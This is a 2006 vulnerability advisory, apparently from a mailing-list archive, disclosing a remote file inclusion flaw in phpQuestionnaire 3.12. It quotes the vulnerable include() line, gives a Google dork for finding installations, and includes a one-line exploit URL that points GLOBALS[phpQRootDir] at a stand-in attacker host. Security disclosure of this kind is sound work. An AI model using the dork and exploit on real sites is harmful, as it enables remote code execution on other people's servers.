SolpotCrew Advisory #12 - phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion

Fri, 22 Sep 2006 15:31:19 -0700 

#############################SolpotCrew 
Community################################

#

#  phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion 

#

#  vendor : http://http://www.chumpsoft.com/products/phpq/

#

#################################################################################

#

#

#       Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)

#

#       contact: [EMAIL PROTECTED] 

# 

#       Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt

#

################################################################################

#

#

#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid

#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , 
Lappet-homo

#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX

#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ 

#              and all member solpotcrew community 

#              especially thx to str0ke @ milw0rm.com

#

###############################################################################

Input passed to the "GLOBALS[phpQRootDir]" is not properly verified  

before being used to include files. This can be exploited to execute  

arbitrary PHP code by including files from local or external resources.  


code from inc/ifunctions.php


################################################################################

# phpQuestionnaire                           Version 3.12                      #

# Copyright 2003-2006 chumpsoft, inc.        August 7, 2006                    #

# http://www.chumpsoft.com/products/phpq/    [EMAIL PROTECTED]             #

################################################################################

# Use of this program constitutes your agreement to the terms contained in the #

# LICENSE file within this distribution.                                       #

################################################################################


include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");


function ImportSurvey ($fp, $type, $flag) {

        set_time_limit(600);  # Attempt to disable time limit in case upgrade 
takes long



google dork : "phpQuestionnaire v3"


exploit : 
http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil


##############################MY LOVE JUST FOR U RIE#########################  

######################################E.O.F##################################

Reply via email to